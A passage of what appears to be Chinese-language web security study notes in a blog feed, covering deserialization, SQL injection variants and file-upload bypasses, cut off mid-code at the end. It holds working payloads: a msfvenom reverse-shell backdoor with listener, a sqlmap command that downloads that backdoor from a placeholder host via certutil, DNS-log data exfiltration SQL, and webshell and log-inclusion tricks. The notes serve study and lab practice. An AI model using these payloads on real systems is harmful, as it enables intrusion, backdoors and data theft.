#89DDFF">$</span><span style="color: #BABED8">s</span><span style="color: #89DDFF">=</span><span style="color: #82AAFF">serialize</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">example</span><span style="color: #89DDFF">);</span><span style="color: #676E95; font-style: italic">//序列化->O:8:"demotest":3:{s:4:"name";s:6:"xiaodi";s:3:"sex";s:3:"man";s:3:"age";s:2:"29";}</span></span><span class="line"><span style="color: #89DDFF">$</span><span style="color: #BABED8">u</span><span style="color: #89DDFF">=</span><span style="color: #82AAFF">unserialize</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">s</span><span style="color: #89DDFF">);</span><span style="color: #676E95; font-style: italic">//反序列化->object(demotest)#2 (3) { ["name"]=> string(6) "xiaodi" ["sex"]=> string(3) "man" ["age"]=> string(2) "29" }</span></span><span class="line"><span style="color: #82AAFF">echo</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">s</span><span style="color: #89DDFF">.'</span><span style="color: #C3E88D"><br></span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #82AAFF">var_dump</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">u</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #82AAFF">echo</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D"><br></span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #89DDFF">?></span></span></code></pre></div><p>创建对象即可触发<code>__construct</code>魔术方法,销毁对象触发<code>__destruct</code>,把类当作字符串使用时触发<code>__toString()</code></p><h4 id="原生类"><a href="#原生类" class="headerlink" title="原生类"></a>原生类</h4><p><a href="https://www.anquanke.com/post/id/264823">浅析PHP原生类-安全客 - 安全资讯平台 (anquanke.com)</a></p><h4 id="漏洞示例"><a href="#漏洞示例" class="headerlink" title="漏洞示例"></a>漏洞示例</h4><h5 id="wakeup-方法绕过"><a href="#wakeup-方法绕过" class="headerlink" title="__wakeup()方法绕过"></a>__wakeup()方法绕过</h5><ul><li><p>如果存在wakeup方法,调用unserilize()方法前则先调用wakeup方法</p></li><li><p>但是序列化字符串中<strong>表示对象属性个数的值大于真实的属性个数</strong>时会**跳过__wakeup()**的执行</p></li></ul><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}</span></span><span class="line"><span style="color: #babed8">//修改为</span></span><span class="line"><span style="color: #babed8">O:4:"Name":3:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}</span></span><span class="line"><span style="color: #babed8"></span></span></code></pre></div><h2 id="JAVA反序列化"><a href="#JAVA反序列化" class="headerlink" title="JAVA反序列化"></a>JAVA反序列化</h2><h4 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h4><ul><li>序列化: Java对象 –> 字节序列</li><li>反序列化: 字节序列 –> Java对象</li></ul><h4 id="利用"><a href="#利用" class="headerlink" title="利用"></a>利用</h4><h5 id="Ysoserial"><a href="#Ysoserial" class="headerlink" title="Ysoserial"></a>Ysoserial</h5><ul><li><p><a href="https://github.com/frohoff/ysoserial">frohoff/ysoserial: A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization. (github.com)</a></p></li><li><p><a href="https://blog.csdn.net/weixin_46684578/article/details/128499673">【Web安全】Ysoserial 简单利用-CSDN博客</a></p></li></ul>]]></content>
<summary type="html"><h1 id="反序列化"><a href="#反序列化" class="headerlink" title="反序列化"></a>反序列化</h1><h4 id="什么是反序列化"><a href="#什么是反序列化" class="headerlink" title="什么是</summary>
</entry>
<entry>
<title>WEB攻防-通用漏洞</title>
<link href="https://myprefer.github.io/post/WEB%E6%94%BB%E9%98%B2-%E9%80%9A%E7%94%A8%E6%BC%8F%E6%B4%9E.html"/>
<id>https://myprefer.github.io/post/WEB%E6%94%BB%E9%98%B2-%E9%80%9A%E7%94%A8%E6%BC%8F%E6%B4%9E.html</id>
<published>2024-03-05T15:07:08.000Z</published>
<updated>2024-04-21T12:31:45.059Z</updated>
<content type="html"><![CDATA[<h1 id="WEB攻防-通用漏洞"><a href="#WEB攻防-通用漏洞" class="headerlink" title="WEB攻防-通用漏洞"></a>WEB攻防-通用漏洞</h1><p>大型靶场<a href="https://vulhub.org/#/environments/">Vulhub - Docker-Compose file for vulnerability environment</a></p><h2 id="SQL注入-补充内容"><a href="#SQL注入-补充内容" class="headerlink" title="SQL注入-补充内容"></a>SQL注入-补充内容</h2><h3 id="ACCESS注入"><a href="#ACCESS注入" class="headerlink" title="ACCESS注入"></a>ACCESS注入</h3><h4 id="偏移注入"><a href="#偏移注入" class="headerlink" title="偏移注入"></a>偏移注入</h4><h5 id="使用场景"><a href="#使用场景" class="headerlink" title="使用场景"></a>使用场景</h5><ul><li>知道表名</li><li>不知道列名</li><li>列名特殊, 无法爆破</li></ul><h5 id="注入原理"><a href="#注入原理" class="headerlink" title="注入原理"></a>注入原理</h5><ul><li><p>假设一个表有8个字段,admin表有3个字段。(需要先判断列数)</p></li><li><p>联合查询payload:union select 1,2,3,4,5,6,7,8 from admin </p></li><li><p>在我们不知道admin有多少字段的情况下可以尝试payload:union select 1,2,3,4,5,6,7,admin.* from admin,此时页面出错</p></li><li><p>直到payload:union select 1,2,3,4,5,admin.* from admin时页面返回正常,说明admin表有三个字段</p></li><li><p>然后通过移动admin.*的位置,就可以回显不同的数据</p></li></ul><h3 id="MYSQL"><a href="#MYSQL" class="headerlink" title="MYSQL"></a>MYSQL</h3><ul><li><p>读取文件</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">select load_file('D:/a.txt');</span></span></code></pre></div></li><li><p>写入文件</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">select 'xxxx' into outfile 'D:/a.txt';</span></span></code></pre></div></li></ul><h3 id="sqlmap"><a href="#sqlmap" class="headerlink" title="sqlmap"></a>sqlmap</h3><ul><li><a href="https://www.cnblogs.com/bmjoker/p/9326258.html">1. sqlmap超详细笔记+思维导图 - bmjoker - 博客园 (cnblogs.com)</a></li></ul><h4 id="sqlmap联动msf"><a href="#sqlmap联动msf" class="headerlink" title="sqlmap联动msf"></a>sqlmap联动msf</h4><ul><li><p>攻击者服务器msf生成后门</p><div class="language-bash"><button title="Copy code" class="copy"></button><span class="lang">bash</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #FFCB6B">msfvenom</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">-p</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">windows/meterpreter/reverse_http</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">lhost=服务器地址</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">lport=端口</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">-f</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">exe</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">-o</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">sql.exe</span></span></code></pre></div></li><li><p>开启监听:</p><div class="language-bash"><button title="Copy code" class="copy"></button><span class="lang">bash</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #FFCB6B">msf6></span><span style="color: #BABED8"> </span><span style="color: #C3E88D">use</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">exploit/multi/handler</span></span><span class="line"><span style="color: #FFCB6B">msf6></span><span style="color: #BABED8"> </span><span style="color: #C3E88D">set</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">lhost</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0.0</span><span style="color: #C3E88D">.0.0</span></span><span class="line"><span style="color: #FFCB6B">msf6></span><span style="color: #BABED8"> </span><span style="color: #C3E88D">set</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">lport</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">6666</span></span><span class="line"><span style="color: #FFCB6B">msf6></span><span style="color: #BABED8"> </span><span style="color: #C3E88D">run</span></span></code></pre></div></li><li><p>sqlmap实现访问下载后门文件</p><div class="language-bash"><button title="Copy code" class="copy"></button><span class="lang">bash</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #FFCB6B">python</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">sqlmap.py</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">-u</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">url</span><span style="color: #89DDFF">"</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">--os-cmd=</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">certutil -urlcache -split -f http://xxxx/sql.exe c:/sql.exe</span><span style="color: #89DDFF">"</span></span></code></pre></div></li></ul><h4 id="脚本使用"><a href="#脚本使用" class="headerlink" title="脚本使用"></a>脚本使用</h4><p>工具无法自动判断加密/编码类型和数据格式(如json), 需要手工注入进行判断</p><ul><li>例如, 用base64编码payload:<div class="language-bash"><button title="Copy code" class="copy"></button><span class="lang">bash</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #FFCB6B">python</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">sqlmap.py</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">-u</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">url</span><span style="color: #89DDFF">"</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">--tamper=base64encode.py</span></span></code></pre></div></li></ul><h4 id="基于堆叠注入-绕过select过滤"><a href="#基于堆叠注入-绕过select过滤" class="headerlink" title="(基于堆叠注入)绕过select过滤"></a>(基于堆叠注入)绕过select过滤</h4><p><a href="https://www.cnblogs.com/cmredkulaa/p/14563311.html">几种绕过select过滤的姿势 - 2hangG3 - 博客园 (cnblogs.com)</a></p><ul><li><p>原语句:</p><div class="language-sql"><button title="Copy code" class="copy"></button><span class="lang">sql</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #F78C6C">1</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">;select flag from `1919810931114514`;</span></span></code></pre></div></li><li><p>由于<code>return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);</code>select被过滤</p></li><li><p>改为:</p><div class="language-sql"><button title="Copy code" class="copy"></button><span class="lang">sql</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #F78C6C">1</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">;set @sql = CONCAT(</span><span style="color: #89DDFF">'</span><span style="color: #BABED8">se</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">,</span><span style="color: #89DDFF">'</span><span style="color: #BABED8">lect </span><span style="color: #89DDFF">*</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">from</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">`</span><span style="color: #C3E88D">1919810931114514</span><span style="color: #89DDFF">`</span><span style="color: #BABED8">;</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">);prepare stmt from @sql;EXECUTE stmt;</span></span></code></pre></div></li><li><p>解析:</p><ul><li><div class="language-sql"><button title="Copy code" class="copy"></button><span class="lang">sql</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #F78C6C">sEt</span><span style="color: #BABED8"> @sql </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">CONCAT</span><span style="color: #BABED8">(</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">se</span><span style="color: #89DDFF">'</span><span style="color: #BABED8">,</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">lect * from `1919810931114514`;</span><span style="color: #89DDFF">'</span><span style="color: #BABED8">);</span></span></code></pre></div><ul><li><code>set</code>用于设置变量名和值</li><li><code>CONCAT</code><strong>拼接语句, 绕过过滤</strong></li></ul></li><li><div class="language-sql"><button title="Copy code" class="copy"></button><span class="lang">sql</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #BABED8">prepare stmt </span><span style="color: #F78C6C">from</span><span style="color: #BABED8"> @sql;</span></span></code></pre></div><p><code>prepare</code>用于预备一个语句,并赋予名称,以后可以引用该语句</p></li><li><div class="language-sql"><button title="Copy code" class="copy"></button><span class="lang">sql</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"></span></code></pre></div></li></ul><p> EXECUTE stmt;</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8"></span></span><span class="line"><span style="color: #babed8">`execute`执行语句</span></span></code></pre></div></li></ul><h3 id="二次注入"><a href="#二次注入" class="headerlink" title="二次注入"></a>二次注入</h3><h5 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h5><ul><li>普通注入: 数据直接进入到 SQL 查询中</li><li>二次注入: 输入数据经处理后<strong>存储</strong>, 取出后, <strong>再次</strong>进入到 SQL 查询</li></ul><h5 id="过程"><a href="#过程" class="headerlink" title="过程"></a>过程</h5><ul><li>插入<code>1‘#</code></li><li>被转义成<code>1\’#</code></li><li>不能注入,但是<strong>保存在数据库</strong>时变成了原来的<code>1’#</code></li><li>利用<code>1’#</code>进行注入,这里利用时要求取出数据时不转义</li></ul><h5 id="案例"><a href="#案例" class="headerlink" title="案例"></a>案例</h5><p><a href="https://buuoj.cn/challenges#[%E7%BD%91%E9%BC%8E%E6%9D%AF2018]Unfinish">网鼎杯2018-Unfinish</a></p><ul><li>注册时在<code>username</code>注入sql语句</li><li>此时数据被转义, <strong>无法注入</strong></li><li>利用邮箱登录后重新加载<code>username</code>, 此时没有转义, 注入语句成功执行</li></ul><h3 id="DNS注入"><a href="#DNS注入" class="headerlink" title="DNS注入"></a>DNS注入</h3><ul><li>DNS协议:将域名转化为IP 日志 => 记录了域名转化IP请求</li></ul><p><em><strong>DNS注入的核心,将盲注转化为显错注入</strong></em></p><ul><li>payload例子:</li></ul><div class="language-sql"><button title="Copy code" class="copy"></button><span class="lang">sql</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #F78C6C">select</span><span style="color: #BABED8"> load_file(</span><span style="color: #82AAFF">concat</span><span style="color: #BABED8">(</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">//</span><span style="color: #89DDFF">'</span><span style="color: #BABED8">,(</span><span style="color: #F78C6C">select</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">database</span><span style="color: #89DDFF">()</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">limit</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0</span><span style="color: #BABED8">,</span><span style="color: #F78C6C">1</span><span style="color: #BABED8">),</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">.81k8pu.dnslog.cn/abc</span><span style="color: #89DDFF">'</span><span style="color: #BABED8">));</span></span></code></pre></div><h2 id="文件上传"><a href="#文件上传" class="headerlink" title="文件上传"></a>文件上传</h2><p>靶场: <a href="https://github.com/c0ny1/upload-labs">c0ny1/upload-labs: 一个想帮你总结所有类型的上传漏洞的靶场 (github.com)</a></p><p>推荐文章: <a href="https://zhuanlan.zhihu.com/p/631648316">一文爽 文件上传漏洞原理、方法和类型详细解析 - 知乎 (zhihu.com)</a></p><h3 id="黑白盒测试"><a href="#黑白盒测试" class="headerlink" title="黑白盒测试"></a>黑白盒测试</h3><h4 id="黑盒"><a href="#黑盒" class="headerlink" title="黑盒"></a>黑盒</h4><p><strong>寻找一切存在文件上传的功能应用</strong></p><ol><li>个人用户中心是否存在文件上传功能</li><li>后台管理系统是否存在文件上传功能</li><li>字典目录扫描探针文件上传构造地址</li><li>字典目录扫描探针编辑器目录构造地址</li></ol><h4 id="白盒"><a href="#白盒" class="headerlink" title="白盒"></a>白盒</h4><p><strong>看三点,中间件,编辑器,功能代码</strong></p><ol><li>中间件直接看语言环境常见搭配</li><li>编辑器直接看目录机构或搜索关键字</li><li>功能代码直接看源码应用或搜索关键字</li></ol><h3 id="解析执行"><a href="#解析执行" class="headerlink" title="解析执行"></a>解析执行</h3><h4 id="user-ini"><a href="#user-ini" class="headerlink" title=".user.ini"></a>.user.ini</h4><ul><li>可以上传一个.user,ini文件, 自定义以php解析特定文件, 例如<div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">auto_prepend_file=test.txt</span></span><span class="line"><span style="color: #babed8">//或者</span></span><span class="line"><span style="color: #babed8">auto_append_file=test.txt</span></span></code></pre></div></li></ul><h4 id="htaccess"><a href="#htaccess" class="headerlink" title=".htaccess"></a>.htaccess</h4><h5 id="原理-1"><a href="#原理-1" class="headerlink" title="原理"></a>原理</h5><ul><li>.htaccess文件是Apache服务器中的一个配置文件</li><li>.apache配置文件为AllowOverride All(默认为None)</li></ul><h5 id="条件"><a href="#条件" class="headerlink" title="条件"></a>条件</h5><ul><li>Apache开启rewrite模块</li></ul><h5 id="示例"><a href="#示例" class="headerlink" title="示例"></a>示例</h5><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8"><FilesMatch"x.png"></span></span><span class="line"><span style="color: #babed8">SetHandlerapplication/x-httpd-php</span></span><span class="line"><span style="color: #babed8"></FilesMatch></span></span></code></pre></div><ul><li>x.png是代码将该目录下文件叫x.png的文件以php进行执行</li><li>上传.htaccess,上传一张名叫x.png的文件,即可执行</li></ul><h3 id="过滤绕过"><a href="#过滤绕过" class="headerlink" title="过滤绕过"></a>过滤绕过</h3><h4 id="绕过过滤"><a href="#绕过过滤" class="headerlink" title="绕过<?php?>过滤"></a>绕过<?php?>过滤</h4><ul><li><code><? ?></code>需要开启短标签开关,short_open_tag</li><li><code><?= ?></code>PHP版本>PHP 5.4.0</li><li><code><% %></code>asp_tags设成On</li><li><code><script language="php"></script></code>php7之后就不能用了</li></ul><h4 id="利用反引号-绕过"><a href="#利用反引号-绕过" class="headerlink" title="利用反引号``绕过"></a>利用反引号``绕过</h4><ul><li>反引号运算符”`”相当于 “shell_exec() “函数, 将里面的内容作为shell命令来执行</li></ul><h4 id="包含日志"><a href="#包含日志" class="headerlink" title="包含日志"></a>包含日志</h4><ul><li><p>将后门代码写入UA头中</p></li><li><p>写入.user.ini配置文件,将日志文件内容通过文件包含访问</p></li><li><p>例如:</p><p><code>user.ini:auto_prepend_file-test.png</code><br><code>test.png:<?=include"/var/lo"."g/nginx/access.lo"."g"?></code></p></li></ul><h4 id="短网址绕过”-”"><a href="#短网址绕过”-”" class="headerlink" title="短网址绕过”.”"></a>短网址绕过”.”</h4><ul><li>在需要远程文件包含, 但过滤了点号<code>.</code>时, 可以使用短链接</li><li>比如<code>http://47.94.236.117/</code>转换为<code>http://794750069/</code>就可以绕过过滤</li></ul><h3 id="文件头检测"><a href="#文件头检测" class="headerlink" title="文件头检测"></a>文件头检测</h3><ul><li><p>文件头部检测是否为图片格式文件, 如图像会检测头部是否为<code>GIF89a</code></p></li><li><h2 id="可在文件头部添加该特征绕过检测-例如-user-ini-GIF89Aauto-prepend-file-test-png"><a href="#可在文件头部添加该特征绕过检测-例如-user-ini-GIF89Aauto-prepend-file-test-png" class="headerlink" title="可在文件头部添加该特征绕过检测, 例如```user ini:GIF89Aauto_prepend_file=test.png"></a>可在文件头部添加该特征绕过检测, 例如<br>```<br>user ini:<br>GIF89A<br>auto_prepend_file=test.png</h2><p>test.png:<br>GIF89A</p><?=include"/var/lo"."g/nginx/access.lo"."g"?></li><li><p><a href="https://www.cnblogs.com/WangAoBo/p/6366211.html">常见文件的文件头标志 - M4x - 博客园 (cnblogs.com)</a></p></li></ul><h3 id="条件竞争"><a href="#条件竞争" class="headerlink" title="条件竞争"></a>条件竞争</h3><p><a href="https://blog.csdn.net/weixin_45588247/article/details/118796606?spm=1001.2014.3001.5501">【文件上传绕过】——条件竞争漏洞-CSDN博客</a></p><h4 id="漏洞原理"><a href="#漏洞原理" class="headerlink" title="漏洞原理"></a>漏洞原理</h4><blockquote><span class="custom-blockquote-svg"><svg width="24" height="24" viewBox="0 0 24 24" fill="" xmlns="http://www.w3.org/2000/svg" data-reactroot=""><path fill="" d="M22 12C22 6.5 17.5 2 12 2C6.5 2 2 6.5 2 12C2 17.5 6.5 22 12 22C13.8 22 15.5 21.5 17 20.6L22 22L20.7 17C21.5 15.5 22 13.8 22 12Z" undefined="1"></path><path fill="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z" undefined="1"></path><path fill="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z" undefined="1"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M17 8.5C15.23 8.97 14.07 10.84 14.01 13.27C14 13.33 14 13.4 14 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M9 8.5C7.23 8.97 6.07 10.84 6.01 13.27C6 13.33 6 13.4 6 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z"></path></svg></span><p>服务器端在处理不同用户的请求时是并发进行的,因此,如果<strong>并发处理不当</strong>或相关<strong>操作逻辑顺序</strong>设计的不合理时,将会导致此类问题的发生</p><p>例如:</p><ul><li>上传文件源代码里没有校验上传的文件</li><li>上传成功后才进行判断</li><li>如果文件格式符合要求,则重命名,如果文件格式不符合要求,将文件删除</li></ul></blockquote><h4 id="利用"><a href="#利用" class="headerlink" title="利用"></a>利用</h4><ul><li>营造10000人同时上传文件1.php的情境, 另外有10000人在同时访问这个1.php</li><li>上传文件时,这个文件会有<strong>一段时间</strong>留存在服务器的上传目录下</li><li>而服务器脚本在进行判断文件是否合法而对文件进行删除时,会有<strong>一定的处理时间</strong></li><li>可能在某个时间里,<strong>服务器还未来得及删除文件</strong>,</li><li>此时利用1.php<strong>重新生成</strong>一个php文件</li></ul><h3 id="二次渲染"><a href="#二次渲染" class="headerlink" title="二次渲染"></a>二次渲染</h3><p><a href="https://blog.csdn.net/qq_40800734/article/details/105920149">文件上传之二次渲染绕过_二次渲染绕过怎么操作-CSDN博客</a></p><p><a href="https://blog.csdn.net/weixin_45588247/article/details/119177948">【文件上传绕过】——二次渲染漏洞_二次渲染绕过-CSDN博客</a></p><h4 id="二次渲染原理"><a href="#二次渲染原理" class="headerlink" title="二次渲染原理"></a>二次渲染原理</h4><blockquote><span class="custom-blockquote-svg"><svg width="24" height="24" viewBox="0 0 24 24" fill="" xmlns="http://www.w3.org/2000/svg" data-reactroot=""><path fill="" d="M22 12C22 6.5 17.5 2 12 2C6.5 2 2 6.5 2 12C2 17.5 6.5 22 12 22C13.8 22 15.5 21.5 17 20.6L22 22L20.7 17C21.5 15.5 22 13.8 22 12Z" undefined="1"></path><path fill="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z" undefined="1"></path><path fill="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z" undefined="1"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M17 8.5C15.23 8.97 14.07 10.84 14.01 13.27C14 13.33 14 13.4 14 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M9 8.5C7.23 8.97 6.07 10.84 6.01 13.27C6 13.33 6 13.4 6 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z"></path></svg></span><p> 在我们上传文件后,网站会对图片进行二次处理(格式、尺寸要求等),服务器会根据我们原有的图片<strong>生成</strong>一个<strong>新的图片</strong>并放到网站对应的标签进行显示。</p></blockquote><h4 id="识别"><a href="#识别" class="headerlink" title="识别"></a>识别</h4><ul><li>检查上传前后图片文件大小是否更改</li></ul><h4 id="绕过"><a href="#绕过" class="headerlink" title="绕过"></a>绕过</h4><ul><li>使用脚本生成图片马, 例如:<div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF"><?</span><span style="color: #BABED8">php</span></span><span class="line"><span style="color: #89DDFF">$</span><span style="color: #BABED8">p </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">array</span><span style="color: #89DDFF">(</span><span style="color: #F78C6C">0xa3</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x9f</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x67</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0xf7</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x0e</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x93</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x1b</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x23</span><span style="color: #89DDFF">,</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #F78C6C">0xbe</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x2c</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x8a</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0xd0</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x80</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0xf9</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0xe1</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0xae</span><span style="color: #89DDFF">,</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x22</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0xf6</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0xd9</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x43</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x5d</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0xfb</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0xae</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0xcc</span><span style="color: #89DDFF">,</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x5a</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0x01</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0xdc</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: 